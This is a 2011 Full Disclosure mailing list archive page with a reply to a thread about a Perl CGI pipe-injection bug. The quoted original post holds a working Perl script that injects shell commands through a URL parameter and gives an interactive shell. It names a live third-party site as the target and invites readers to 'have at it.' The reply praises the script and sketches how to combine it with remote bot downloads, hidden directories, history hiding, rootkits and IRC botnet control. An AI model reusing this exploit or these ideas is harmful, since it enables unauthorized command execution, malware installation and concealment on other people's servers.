Full Disclosure mailing list archives
Re: perl pipe exploit (drops you at a shell)
From: xD 0x41 <secn3t () gmail com>
Date: Sun, 16 Oct 2011 11:44:58 +1100
Thanks for the POST! hats VERY cool, althugh it was done before, and i did not match codes to see any differences/changes/updates, because I am aware that many systems are being fixed against this bug as I know, or rather, perl stdinout is maybe being patched in some versions, although it does seem to work stable on Debian lenny and thats ok, that would mean most likely Ubuntu is also vulnerable... Personally, i have code wich is about half the size of bth the ones i have seen, but they do a download to box, so, it is a personal wget.pl wich gets , makes dir if none exists, cds to dir, and the cmd is simply like this ./file.pl pipeget www.blah.com/mybot.txt /var/.inaddr/arpa.ps This would then save file, and chmod it automatically as chmod filename +x , wich is just a command i thought was critical when this type of stuff is used... So, I might try and personalise this, and see if it works better, I know the first method i was using to get, was nothing like the one i have now wich is pipe() also but, it just totally makes the need for using wget not needed, and then also the file and whole session of ./file.pl, gets saved to bash_history as a . on its own line, wich is including if you upload/get files from one box and up to the local one your sitting on. Your version, looks the most adaptive one, and would be great to have enabled on any connectback shell, maybe chmod cmd could be automatic when it puts a file upload/download, however you access it, I know main way a user on a control net, would simply privmsg it, and use that pipe exploiting to upload everything, chmod, and hide eveything, wich is probably the BEST addon i could thinkof for any rootkit, and even just upload command, if you target index.php, and look for pg=/page=, maybe a simple my @array("'?page=', '?pagina=', '?pg=', '?Page=', '?url=', "); for it to target things, and make it show simple CMDS> output on connect-back, then print a quick sysinfo and, makesure to show things right on the connectback, then have this, and direct a while($perl_pipe_uploader2) {} ,maybe adding in if/else using the first perlpipeupload.pl as the first method.. this could be great! i will look for my code wich is more like a wget but, it uses the exact same bugs to , actually works better than the standard get/wget or fetch, as it is no switches needed, just the corect args, and it does the rest in execl() mode, thru this, i have i think in old days probably used this bug somuch, it became a feautre for awhile :P I think the scripting is great, the code is good, clear and concise,. and very easy to simply use as an addon case 'perlpipeupload2': or, however you may add it.. it is awesome code. I ight have to snippet this posting and, show both, or, al 3 on my website (crazycoders.com) ,and if you have a Posting already up wich will stay there, id be happy to point to it, and also paste it, so, thanks! i will try and find the code for the wget/put/uploader, when your in PM with a bot and you do !cmd mywget a.at/bot /b/o/t , only switches is -s|-n for silent or notice user exact infos, prettymuch a wget-summary. I like the code and appreciate your posting. It is a nice bug and even nicer method to exploit it. regards, xd-- // #haxnet@EFnet // Independant Arsehole PS: shizzle my nizzle matey! shizzle it good! On 16 October 2011 09:01, Marshall Whittaker <marshallwhittaker () gmail com>wrote:
Well shit. It did send twice. :( Now I look like a goof, haha. On Sat, Oct 15, 2011 at 6:58 PM, Marshall Whittaker < marshallwhittaker () gmail com> wrote:This works off the perl pipe read bug, you can just input the first and second parts of the web address (with http:// included) and it'll drop you at a shell. When using cd you must use the absolute path because I was too lazy to do it the correct way. ;-). I know this is pretty easy stuff, it works off those vulns that can just be exploited with a web browser, but this gives you a shell. So have at it guys & gals! Had to resend because I got some message about my attachment being blocked. Not sure if it really was, though, I'll send again anyway. Hope this isn't spamming the list. =/ Site: http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=stats/1966vinmatrix.htm&desc=Stat+File Useage: ./sublime.pl " http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=" "&desc=Stat+File" Should work on most perl cgi scripts that are vulnerable to | read bug. Please note, it's not a "real" shell, but almost everything works, except things that won't go in one instance like cd-ing and env vars, etc. Play nice! --oxagast [CODE] #!/usr/bin/perl # adaptive cgi shell by oxagast use LWP::Simple; $part1 = @ARGV[0]; $part2 = @ARGV[1]; print "Making buffer...\n"; for $bet (100..200) { $bettwo = $bettwo . "AAAA" . $bet . "AAAA\\\\n"; } print "Exploiting...\n"; $id = get("$part1\|id\|$part2"); $id =~ m/(uid=\d+\(.*\) gid=\d+\(.*\) groups=\d+\(.*\))/; print "Well shizzle my nizzle... shell by oxagast... use wisely \;\)\n\n"; $uid = $1; print "$uid\n"; while (0 == 0) { print "\$ "; $cmd = <STDIN>; chomp($cmd); if ($cmd =~ m/cd (\/.*)/) { $dir = $1; } if ($cmd eq "cd ..") { $dir =~ s/(.*)\/.*/\/\1/; } if ($cmd eq "pwd") { $dirjunk = $dir; if ($dirjunk eq "//") { $dirjunk = "/"; } } $dirjunk = "cd $dir\;$cmd"; $cmdhex = unpack("H*","$dirjunk &>/tmp/cmdlnerr"); $cmdhex =~ s/(..)/\\\\x$1/g; get("$part1\|echo -e $bettwo > /tmp/buff\|$part2"); $backjunk2 = get("$part1\|cat /tmp/buff\|$part2"); @backjunk = split("\n", $backjunk2); get("$part1\|echo -e \"$cmdhex\" > /tmp/cmdln\|$part2"); get("$part1\|/bin/sh /tmp/cmdln > /tmp/cmdlerr\|$part2"); $backjunk_as = get("$part1\|cat /tmp/cmdlnerr\|$part2"); @backjunk_split = split("\n", $backjunk_as); $backjunk_wcl = get("$part1\|wc -l /tmp/cmdlnerr\|$part2"); $backjunk_wcl =~ m/(\d+) \/tmp\/cmdlnerr/m; $thismanylines = $1 - 1; for $junknum (0..scalar(@backjunk_split)) { for $fuzz (10..100+$thismanylines) { if ($backjunk[$junknum] =~ m/(AAAA\Q$fuzz\EAAAA)/) { $middle = $1; @backjunk[$junknum] =~ m/(.*)\Q$middle\E/; @backjunk_split[$junknum] =~ s/$1//; @backjunk[$junknum] =~ m/\Q$middle\E(.*)/; @backjunk_split[$junknum] =~ s/$1//; print "$backjunk_split[$junknum]\n"; } } } } [/CODE]_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- perl pipe exploit (drops you at a shell) Marshall Whittaker (Oct 15)
- Re: perl pipe exploit (drops you at a shell) Marshall Whittaker (Oct 15)
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 15)
- Message not available
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 15)
- Message not available
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 15)
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 15)
- Message not available
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 15)
- Message not available
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 16)
- Message not available
- Re: perl pipe exploit (drops you at a shell) Valdis . Kletnieks (Oct 16)
- Re: perl pipe exploit (drops you at a shell) Marshall Whittaker (Oct 15)